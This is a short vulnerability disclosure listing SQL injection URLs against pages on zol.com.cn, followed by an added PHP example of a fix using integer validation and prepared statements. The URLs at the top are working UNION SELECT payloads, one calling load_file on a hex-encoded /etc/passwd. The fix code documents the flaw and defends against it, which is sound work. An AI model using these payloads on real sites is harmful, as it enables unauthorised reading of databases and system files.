http://viewsonic.zol.com.cn/detail.php?Id=-1428+union+select+1,2/*
http://active.zol.com.cn/08active/413ainol/detail.php?Id=-9021/**/union/**/select/**/load_file(0x2F6574632F706173737764),2,3,4/*
Proof of vulnerability:
http://active.zol.com.cn/08active/413ainol/detail.php?Id=-9021/**/union/**/select/**/load_file(0x2F6574632F706173737764),2,3,4/*
Solution: Filter
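
One way to implement the "Filter" fix, as an added example that is not the site's own code. It assumes detail.php passes the id parameter straight into a MySQL query; the `products` table, the function names and the in-memory SQLite database standing in for MySQL are hypothetical. The two rejected inputs are the payloads from the URLs above (the hex literal in the second decodes to /etc/passwd).

```php
<?php
declare(strict_types=1);
// Added example: hypothetical table and function names; SQLite stands in for MySQL.

/** Accept only a positive decimal integer. Anything else is rejected, never "cleaned". */
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;                 // missing value, or an array from ?id[]=...
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up one row with a bound integer parameter; the input never becomes SQL text. */
function fetch_detail(PDO $db, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null;                 // caller should answer 400 or 404
    }
    $stmt = $db->prepare('SELECT id, title FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false
// so that statements are prepared on the server.
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO products VALUES (1428, 'Sample monitor')");

$inputs = [
    '1428',                          // legitimate request
    '-1428 union select 1,2 /*',     // first URL above, "+" decoded to spaces
    '-9021/**/union/**/select/**/load_file(0x2F6574632F706173737764),2,3,4/*',
];
foreach ($inputs as $in) {
    $row = fetch_detail($db, $in);
    printf("%-30.30s => %s\n", $in, $row ? $row['title'] : 'rejected');
}
```

In MySQL, LOAD_FILE() only works for accounts that hold the FILE privilege, so the web application's database account should not be granted it.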